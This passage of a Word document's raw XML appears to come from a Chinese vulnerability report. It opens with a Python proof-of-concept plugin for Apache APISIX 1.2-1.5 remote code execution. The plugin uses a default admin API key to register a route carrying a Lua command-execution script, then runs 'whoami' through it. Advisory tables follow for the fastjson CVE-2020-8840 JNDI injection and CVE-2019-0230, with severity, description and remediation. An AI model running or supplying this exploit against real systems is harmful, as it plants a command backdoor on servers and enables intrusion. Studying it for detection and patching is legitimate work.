        <w:t xml:space="preserve">''' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35702A7C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulType = '''RCE'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A9AEF" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B68C08" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>references = ['''https://mp.weixin.qq.com/s/QnAyz8t1LGBsgTpexUNlwA''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426D425" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appName = '''Apache APISIX'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A53CA0" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appVersion = '''Apache APISIX 1.2-1.5'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E138DE8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37D791" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55D127" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0345D290" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB8880" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="57A05418" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6F309" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>self.url,ip,port = parse_ip_port(self.target, 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376683B3" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7454A" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>randstr = ''.join(random.choice(string.ascii_letters) for _ in range(10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A0ADD" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="15CF982E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>path = """/apisix/admin/routes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DD2A8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>method = "POST"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25576ED8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264418F5" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"uri":"/{randstr}".format(randstr=randstr),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E233B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A5911" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"upstream":{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7915C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"type":"roundrobin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F02208" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"nodes":{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B565BCE" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"example.com:80":1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CD1F1" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DED7CD" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109B7BB" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA35C2" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>headers = {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D2F7E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>resp0 = requests.request(method=method,url=self.url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23AA59" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="594AED4D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>path = """/{randstr}?cmd=whoami""".format(randstr=randstr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E7C10" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>method = "GET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A4A87" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>headers = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9F947" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>resp1 = requests.request(method=method,url=self.url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D09A2" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print(resp1.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75877AF8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69856451" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="3D666ABE" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19C368" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A3218" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="051076DF" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD0CAC" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC08A6" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E747A95" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.success(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F7B66" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DD228" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.fail('Failed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F41F72" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D674D3A" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="7631C528" w14:textId="3F0A8ACE" w:rsidR="00FF4132" w:rsidRPr="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C362F34" w14:textId="727EB38A" w:rsidR="00FE1C0F" w:rsidRPr="00AC3E9B" w:rsidRDefault="00000000" w:rsidP="00AC3E9B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="2EC923CB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5BDB4F6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F763" w14:textId="591247B2" w:rsidR="00FE1C0F" w:rsidRPr="00BD224F" w:rsidRDefault="00BD224F" w:rsidP="00BD224F">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD224F">
              <w:t>CVE-2020-8840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68FBE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52C1" w14:textId="41B0C8C9" w:rsidR="00FE1C0F" w:rsidRDefault="00BD224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46AB7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B597" w14:textId="718FC2B8" w:rsidR="00FE1C0F" w:rsidRDefault="00BD224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BD224F">
              <w:t>CVE-2020-8840</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="29973547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56EF697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E283" w14:textId="6E099F78" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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2020.2.10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858B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0A0E" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F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A656B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ABC3" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F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FE1C0F" w14:paraId="21E2C908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8E3ABAD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DF3E" w14:textId="11A9486D" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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2020.2.10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AA2DBA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4178" w14:textId="5FE51A91" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>cowtownc</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>oder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4146AC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lastRenderedPageBreak/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2986" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F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FE1C0F" w14:paraId="622FFD83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446F919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E89C" w14:textId="43670E62" w:rsidR="00FE1C0F" w:rsidRDefault="00BD224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9.8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E68CF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B9A0" w14:textId="2B1D85E2" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>cowtowncoder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8F33C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22E8" w14:textId="4F696234" w:rsidR="00FE1C0F" w:rsidRDefault="00BD224F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fastjson</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="1DF8DACF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61D859F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0858" w14:textId="16329B96" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>fastjson &lt;= 1.2.62</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="760C7E8A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EEEEB92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3EF7" w14:textId="1ED56684" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8840</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="5EE1C630" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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85F7B27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D4B" w14:textId="28DFDBAF" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E7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FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NVD</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发布的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Jackson-databind JNDI</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入漏洞（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2020-8840</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>jackson-databind</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的反序列化</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>gadget</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也同样影响了</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>fastjson</w:t>
            </w:r>
            <w:r w:rsidR="007A3E04">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="793947D8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67D0784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11E4" w14:textId="0620F143" w:rsidR="00FE1C0F" w:rsidRDefault="00FE7E79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r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在开启了</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>autoType</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能的情况下（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>autoType</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能默认关闭），该漏洞影响最新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>fastjson 1.2.62</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本，攻击者利用该漏洞可实现在目标机器上的远程代码执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="274C47B4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5861884" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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3AEC" w14:textId="12F98C3E" w:rsidR="00FE1C0F" w:rsidRPr="006907F1" w:rsidRDefault="006907F1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r w:rsidRPr="006907F1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://mp.weixin.qq.com/s?__biz=Mzk0MjE3ODkxNg==&amp;mid=2247485658&amp;idx=2&amp;sn=e4d52df2e4fca742f22196fef91b5afa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="69DAAE66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467814F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8108" w14:textId="4F12D786" w:rsidR="00FE1C0F" w:rsidRDefault="006907F1">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="59D85C09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5617C7E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9471" w14:textId="57F7AE8E" w:rsidR="00FE1C0F" w:rsidRDefault="006907F1"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 w:rsidR="00FE1C0F" w14:paraId="2F09D7DA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C4FACD2" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="000000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F2D" w14:textId="55FF9183" w:rsidR="00FE1C0F" w:rsidRDefault="006907F1">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>升级或关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE7E79">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>autoType</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C51020" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B" w:rsidP="00AC3E9B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9342" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1304"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1446"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1531"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1187"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1627"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1456"/>
        <w:gridCol w:w="113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="59EEECE0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FE53231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35E0" w14:textId="3F7D969F" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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F570E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2019-0230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F6B56D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1BC0" w14:textId="09CB63AF" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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RCE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43FAF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F97D" w14:textId="66CBC33C" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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F570E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2019-0230</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="6EBABA8A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E023D9E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B3FB" w14:textId="77C907AC" w:rsidR="00AC3E9B" w:rsidRDefault="00460F73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460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2020</w:t>
            </w:r>
            <w:r w:rsidRPr="00460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidRPr="00460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="00460F73">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日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F9F5E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A44C" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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8FEEF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CC1A" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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AC3E9B" w14:paraId="18863D34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C9329B6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提交时间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DC0D" w14:textId="4BB18BC5" w:rsidR="00AC3E9B" w:rsidRDefault="00B7287A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B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2020</w:t>
            </w:r>
